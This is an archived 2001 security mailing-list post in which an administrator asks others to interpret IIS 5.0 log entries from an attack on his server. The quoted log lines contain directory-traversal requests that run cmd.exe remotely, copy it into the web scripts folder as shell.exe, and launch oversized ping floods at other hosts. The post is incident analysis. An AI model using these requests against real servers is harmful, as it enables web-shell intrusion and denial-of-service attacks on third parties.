Unicode Logs with Ping Activity

From: myrddin_eat_private
Date: Tue Jul 10 2001 - 09:24:50 PDT

  • Next message: Curt Purdy: "RE: TCP Src 5635: what is it?"

    Would like someone to help me understand what is going on here... The 502 
    error at the end end of these entries would indcicate failures, wouldn't 
    they? I've been all through the logs on this box, and even thought at every 
    attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    shows a 502, it is there.
    
    I'm looking at the times on the log entries and guessing that this was a 
    manual attack.
    
    Also, can someone please explain what is being attempted with these pings?
    aaa.aaa.aaa.aaa
    bbb.bbb.bbb.bbb
    ccc.ccc.ccc.ccc.ccc
    ddd.ddd.ddd.ddd.ddd 
    are all unique addresses.
    
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2001-06-19 18:44:15
    #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    uri-query sc-status cs(User-Agent) 
    2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
    502 -
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    
    
    IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
    Get your FREE, totally secure email address at http://www.hushmail.com.
    



    This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:39:22 PDT